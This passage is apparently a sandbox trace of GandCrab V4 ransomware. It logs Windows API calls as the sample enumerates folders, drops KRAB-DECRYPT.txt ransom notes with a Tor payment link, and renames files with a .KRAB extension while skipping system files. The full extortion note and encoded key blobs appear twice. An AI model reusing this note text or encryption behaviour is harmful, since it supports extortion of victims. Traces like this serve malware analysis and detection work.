/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0074.023] WriteFile (in: hFile=0x468, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e0a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e0a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0074.024] CloseHandle (hObject=0x468) returned 1 [0074.024] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.025] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0074.025] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x15, wMilliseconds=0xdc)) [0074.025] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0074.025] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0074.025] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0074.026] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\d2ca4a08d2ca4dee3d.lock") returned 119 [0074.026] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\smartart graphics\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x468 [0074.031] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.031] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.031] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\") returned 96 [0074.031] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\*" [0074.031] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\*", lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 0x1023db8 [0074.031] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.031] FindNextFileW (in: hFindFile=0x1023db8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0074.031] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.032] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.032] FindNextFileW (in: hFindFile=0x1023db8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0074.032] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0074.032] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0074.032] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\", lpString2="1033" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033" [0074.032] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\" [0074.032] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0074.032] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0074.032] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0074.032] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0074.032] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0074.032] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.033] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0074.033] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\\\KRAB-DECRYPT.txt") returned 118 [0074.033] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\smartart graphics\\1033\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0074.035] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0074.035] WriteFile (in: hFile=0x470, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338de20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338de20*=0x1f6e, lpOverlapped=0x0) returned 1 [0074.036] CloseHandle (hObject=0x470) returned 1 [0074.036] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.036] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0074.037] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x15, wMilliseconds=0xec)) [0074.037] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0074.037] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0074.037] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0074.037] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\d2ca4a08d2ca4dee3d.lock") returned 124 [0074.037] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\smartart graphics\\1033\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x470 [0074.038] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.038] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.038] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\") returned 101 [0074.038] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\*" [0074.038] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\*", lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 0x1023bf8 [0074.039] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.039] FindNextFileW (in: hFindFile=0x1023bf8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0074.039] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.039] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.039] FindNextFileW (in: hFindFile=0x1023bf8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0074.039] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0074.039] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0074.039] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\d2ca4a08d2ca4dee3d.lock" [0074.039] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0074.039] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 129 [0074.039] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\d2ca4a08d2ca4dee3d.lock") returned 124 [0074.039] lstrlenW (lpString=".lock") returned 5 [0074.039] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0074.040] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0074.040] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.040] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.040] FindNextFileW (in: hFindFile=0x1023bf8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0074.040] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0074.040] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0074.040] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\KRAB-DECRYPT.txt" [0074.040] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0074.041] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\KRAB-DECRYPT.txt.KRAB") returned 122 [0074.041] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\KRAB-DECRYPT.txt") returned 117 [0074.041] lstrlenW (lpString=".txt") returned 4 [0074.041] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0074.041] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0074.041] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.042] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\KRAB-DECRYPT.txt") returned 117 [0074.042] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\KRAB-DECRYPT.txt") returned 117 [0074.042] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0074.042] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0074.042] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0074.042] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0074.042] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0074.042] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0074.042] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0074.042] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0074.042] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0074.042] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0074.042] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.042] FindNextFileW (in: hFindFile=0x1023bf8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 0 [0074.042] FindClose (in: hFindFile=0x1023bf8 | out: hFindFile=0x1023bf8) returned 1 [0074.042] CloseHandle (hObject=0x470) returned 1 [0074.043] FindNextFileW (in: hFindFile=0x1023db8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0074.043] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0074.043] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0074.043] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\d2ca4a08d2ca4dee3d.lock" [0074.043] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0074.043] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 124 [0074.043] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\d2ca4a08d2ca4dee3d.lock") returned 119 [0074.043] lstrlenW (lpString=".lock") returned 5 [0074.043] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0074.044] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0074.044] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.044] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.044] FindNextFileW (in: hFindFile=0x1023db8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0074.044] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0074.044] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0074.044] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\KRAB-DECRYPT.txt" [0074.044] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0074.045] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\KRAB-DECRYPT.txt.KRAB") returned 117 [0074.045] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\KRAB-DECRYPT.txt") returned 112 [0074.045] lstrlenW (lpString=".txt") returned 4 [0074.045] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0074.045] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0074.046] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.046] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\KRAB-DECRYPT.txt") returned 112 [0074.046] 